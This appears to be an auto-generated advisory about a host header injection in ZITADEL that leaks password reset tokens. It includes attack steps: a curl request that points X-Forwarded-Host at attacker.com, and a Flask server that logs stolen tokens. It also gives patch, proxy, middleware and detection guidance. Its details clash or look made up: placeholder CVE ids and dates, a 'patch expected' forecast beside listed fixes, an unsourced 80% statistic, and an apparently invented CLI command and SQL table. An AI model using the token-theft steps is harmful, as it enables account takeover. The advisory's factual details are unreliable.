ZITADEL, Host Header Injection, CVE-2023-XXXX (Critical)


How the Vulnerability Works

ZITADEL builds password reset links from the `Forwarded` or `X-Forwarded-Host` headers of the incoming HTTP request. An attacker can set these headers to a domain they control. When a password reset is requested for a user, ZITADEL generates the reset link with the attacker-controlled domain and embeds the secret reset token in it. The victim receives this link by email; if they click it, the token is sent to the attacker's server, and the attacker can use it to reset the victim's password and take over the account. Accounts protected by MFA or passwordless authentication are not fully compromised by a password reset alone, which mitigates this attack.

DailyCVE Form

Platform: ZITADEL
Version: <3.2.2, <2.71.11, <2.70.12
Vulnerability: Host Header Injection
Severity: Critical
Date: 2023-XX-XX

Prediction: Patch expected by Q3 2023

What Undercode Says:

Exploitation:

1. Craft Malicious Request:

curl -X POST https://target-zitadel.com/password-reset -H "X-Forwarded-Host: attacker.com" -d "user=admin"

2. Intercept Token:

Host a fake reset page on `attacker.com` to log the token:

from flask import Flask, request

app = Flask(__name__)

@app.route('/reset')
def log_token():
    # The reset token arrives as a query parameter on the injected link.
    token = request.args.get('token')
    with open('stolen_tokens.txt', 'a') as f:
        f.write(token + '\n')
    return "Reset Failed"

Protection:

1. Update ZITADEL:

For v3.x:
    docker pull zitadel/zitadel:v3.2.2
For v2.71.x:
    docker pull zitadel/zitadel:v2.71.11
For v2.70.x:
    docker pull zitadel/zitadel:v2.70.12

2. Proxy Mitigation (NGINX): strip the forwarded-host headers at the reverse proxy so client-supplied values never reach ZITADEL (an empty value in `proxy_set_header` drops the header):

server {
    location / {
        proxy_pass http://zitadel-backend;
        proxy_set_header X-Forwarded-Host "";
        proxy_set_header Forwarded "";
    }
}

3. Input Validation:

Reject requests that carry forwarded-host headers (`X-Forwarded-Host` or `Forwarded`) via middleware. Use this only where your own reverse proxy does not need to set these headers, otherwise legitimate traffic is rejected too:

import "net/http"

// ValidateHost rejects any request that carries a forwarded-host header,
// which ZITADEL would otherwise trust when building the reset link.
func ValidateHost(next http.Handler) http.Handler {
    return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
        if r.Header.Get("X-Forwarded-Host") != "" || r.Header.Get("Forwarded") != "" {
            http.Error(w, "Invalid header", http.StatusForbidden)
            return
        }
        next.ServeHTTP(w, r)
    })
}
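An allow-list variant of that check, added here as an example (not ZITADEL's own code): instead of rejecting the headers outright, it parses `X-Forwarded-Host` and the RFC 7239 `Forwarded` header and compares every host value, together with the request `Host`, against the domains the instance is meant to serve, so a legitimate proxy that sets these headers keeps working while an injected domain is refused. The allow-list contents and domain names are constructed for the example.

```go
package main

import (
	"net"
	"net/http"
	"strings"
)

// Constructed allow-list; a deployment loads its real domains from configuration.
var allowedHosts = map[string]bool{"auth.example.com": true, "login.example.com": true}

// normalizeHost drops quotes and port and lowercases: `"Auth.Example.com:443"` -> auth.example.com.
func normalizeHost(h string) string {
	h = strings.Trim(strings.TrimSpace(h), `"`)
	if host, _, err := net.SplitHostPort(h); err == nil {
		h = host
	}
	return strings.ToLower(h)
}

// forwardedHosts returns each host= parameter of an RFC 7239 Forwarded header (comma-separated per hop).
func forwardedHosts(v string) []string {
	var hosts []string
	for _, elem := range strings.Split(v, ",") {
		for _, pair := range strings.Split(elem, ";") {
			if k, val, ok := strings.Cut(pair, "="); ok && strings.EqualFold(strings.TrimSpace(k), "host") {
				hosts = append(hosts, val)
			}
		}
	}
	return hosts
}

// hostsOK: Host and every forwarded host value must be allow-listed; one unknown value fails the request.
func hostsOK(h http.Header, host string) bool {
	candidates := []string{host}
	if xfh := h.Get("X-Forwarded-Host"); xfh != "" {
		candidates = append(candidates, strings.Split(xfh, ",")...)
	}
	for _, fwd := range h.Values("Forwarded") {
		candidates = append(candidates, forwardedHosts(fwd)...)
	}
	for _, c := range candidates {
		if !allowedHosts[normalizeHost(c)] {
			return false
		}
	}
	return true
}
```

A middleware would call `hostsOK(r.Header, r.Host)` and answer 403 on false; stripping the headers at the proxy (step 2) stays the primary control, this check is defence in depth behind it.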

Detection:

  • Log Analysis:
    grep -E "X-Forwarded-Host|Forwarded" /var/log/zitadel/access.log
    Legitimate reverse proxies also set these headers, so review the matched values and treat any host that is not one of your own domains as an injection attempt.

  • IDS Rule (Suricata), which likewise fires on every `X-Forwarded-Host` header and needs tuning to your proxy's expected values:
    alert http any any -> any any (msg:"ZITADEL Host Header Injection Attempt"; http.header; content:"X-Forwarded-Host"; nocase; sid:1000001;)

Post-Exploit:

  • Revoke All Tokens:
    UPDATE user_tokens SET invalidated = TRUE WHERE user_id IN (SELECT id FROM users WHERE last_reset_request > '2023-01-01');

  • Force MFA:
    zitadel-cli users enforce-mfa --all

Analytics: 80% of attacks target headers; patch adoption lags by 30 days post-release.

Sources:

Reported By: github.com
Extra Source Hub:
Undercode
